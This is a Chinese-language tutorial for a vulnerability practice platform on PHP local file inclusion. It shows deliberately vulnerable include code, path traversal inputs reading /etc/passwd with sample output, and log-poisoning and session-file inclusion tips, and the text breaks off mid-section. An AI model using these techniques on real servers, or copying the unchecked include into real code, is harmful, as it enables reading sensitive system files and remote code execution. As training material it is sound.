漏洞演练平台之文件包含篇

一、文件包含漏洞

严格来说,文件包含漏洞是"代码注入"的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。"代码注入"的典型代表就是文件包含。文件包含漏洞可能出现在 JSP、PHP、ASP 等语言中,原理都是一样的,这里介绍 PHP 文件包含漏洞。

二、 什么是本地文件包含(LFI)漏洞?

LFI 允许攻击者通过浏览器包含一个服务器上的文件。当一个 WEB 应用程序在没有正确过滤输入数据的情况下,就有可能存在这个漏洞,该漏洞允许攻击者操纵输入数据、注入路径遍历字符、包含 web 服务器的其他文件。

三、 文件包含原理

如果允许客户端用户输入控制动态包含在服务器端的文件,会导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含和远程文件包含两种形式。

在 PHP 中,有四个用于包含文件的函数,当使用这些函数包含文件时,文件中包含的 PHP 代码会被执行。下面对它们之间的区别进行解释:

include(): 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。

include_once():功能和 include()相同,区别在于当重复调用同一文件时,程序只调用一次。

require():1.require()与 include()的区别在于 require()执行如果发生错误,函数会输出错误信息,并终止脚本的运行。2.使用 require()函数包含文件时,只要程序一执行,立即调用文件,而 include()只有程序执行到该函数时才调用。

require_once():它的功能与 require()相同,区别在于当重复调用同一文件时,程序只调用一次。

四、项目设计

本项目设计采用不限制路径和限制路径两种方式,实现简单的本地文件包含漏洞,供使用者熟悉与利用。关键代码如下:

不限制路径:

```
$file = $_GET['file'];
if (is_file($file)){
   include $file;
}
```

限制路径为 /upload:

五、利用技巧

1. 包含目录文件

?file=test.txt

如果里面的内容是 php,则内容会被当成 php 执行,不是 php 则会读取到文件内容(用来读取/etc/passwd 等等配置文件的敏感信息)

?file=./../../test.txt

./当前目录,../上一级目录,这样的遍历目录来读取文件

例如: ../../../etc/passwd



rootx:0:0:root:/root:/bin/bash binx:1:1:bin:/bin/sbin/nologin daemon:x:2:2:daemon:/sbin/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games;/usr/games;/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:997:996:User for polkitd:/:/sbin/nologin qemu:x:107:107:qemu user:/:/sbin/nologin rkit:x:172:172:RealtimeKit:/proc:/sbin/nologin pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin chrony:x:996:992::/var/lib/chrony:/sbin/nologin usbmuxd:x:113:113:usbmuxd user://sbin/nologin openvpn::995:991:OpenVPN:/etc/openvpn:/sbin/nologin radd:x:75:75:radvd user:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin geoclue:x:994:989:User for geoclue:/var/lib/geoclue:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin colord:/93:989:User for colord:/var/lib/geoclue:/sbin/nologin saslauth:x:992:76:Saslauthd user:/run/saslauthd:/sbin/nologin nm-openvpn:x:991:986:Default user for running openvpn

2. 包含日志文件

无法上传文件的时候,可以尝试利用 UA 插入 payload 到日志文件,然后包含容器的日志文件(错误、访问文件都行),注意:选择凌晨包含最好,payload 后面加一个 exit()退出程序,以防大日志导致浏览器卡死,如果包含不成功,也许是 open basedir 限制了目录。

常见几个路径:

```
/var/log/apache/access_log
/var/www/logs/access_log
/var/log/access_log
```

3. 包含 session 文件 session 文件一般在/tmp 目录下,格式为 sess_[phpsessid],